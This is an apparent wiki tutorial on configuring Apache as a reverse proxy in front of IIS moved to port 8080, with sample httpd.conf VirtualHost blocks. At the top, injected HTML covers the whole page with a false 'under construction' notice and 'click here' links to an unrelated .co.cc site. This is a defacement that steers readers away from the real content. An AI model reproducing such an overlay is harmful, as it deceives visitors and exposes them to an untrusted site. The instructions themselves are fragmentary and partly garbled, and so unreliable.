----
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
----
=[http://ogetehuvo.co.cc This Page Is Currently Under Construction And Will Be Available Shortly, Please Visit Reserve Copy Page]=
----
=[http://ogetehuvo.co.cc CLICK HERE]=
----
</div>
{{Nav reverse proxy server}}
Change the IIS port for example 8080 using Internet Service Manager, each site must bind to port 8080.
{|width=""600""|-style=""background:#e8e8e8""
! Microsoft Internet Information Server version 3.0
|-style=""background:#f5f5f5""
|
# Open Internet Service Manager.
# Using the Internet Service Manager, stop and restart the IIS Services.
|}
<<br>>{|width=""600""|-style=""background:#e8e8e8""
! Microsoft Internet Information Services versions 4.0 to 6.0
|-style=""background:#f5f5f5""
|
# Open Internet Service Manager or Internet Information Services (IIS) Manager.
The set-up is similar to that shown on the previous page. Edit configuration file C:\server_a\UniServer\usr\local\apache2\conf\httpd.conf\'''httpd.conf'''
{|cellpadding=""6""
|-
|valign=""top""|<<pre>>
NameVirtualHost *
<<VirtualHost *>>
ServerName localhost:80
DocumentRoot /www
ProxyRequests off
<<Proxy *>>
Order deny,allow
Deny from all
Allow from 127.0.0.1
<</Proxy>>
ProxyPassReverse / http://localhost:8080/
RewriteRule ^/DotNetApp(.*)$ http://localhost:8080/DotNetApp/$1 [P,L]
<</VirtualHost>><</pre>>
|
'''''Notes'':'''
Depending on your application you may need to preserve host headers. Try something like this:
{|cellpadding=""6""
|-
|valign=""top""|<<pre>>
NameVirtualHost *
<<VirtualHost *>>
ServerName localhost:80
DocumentRoot /www
ProxyRequests off
<<Proxy *>>
Order deny,allow
Deny from all
Allow from 127.0.0.1
<</Proxy>>
RewriteEngine On
RewriteRule ^/DotNetApp(.*)$ http://localhost:8080/DotNetApp/$1 [P,L]
<</VirtualHost>><</pre>>
|
----
{|
|-valign=""middle""
| [[Image:uc_small_logo.gif]] || [[User:Ric|Ric]]
|}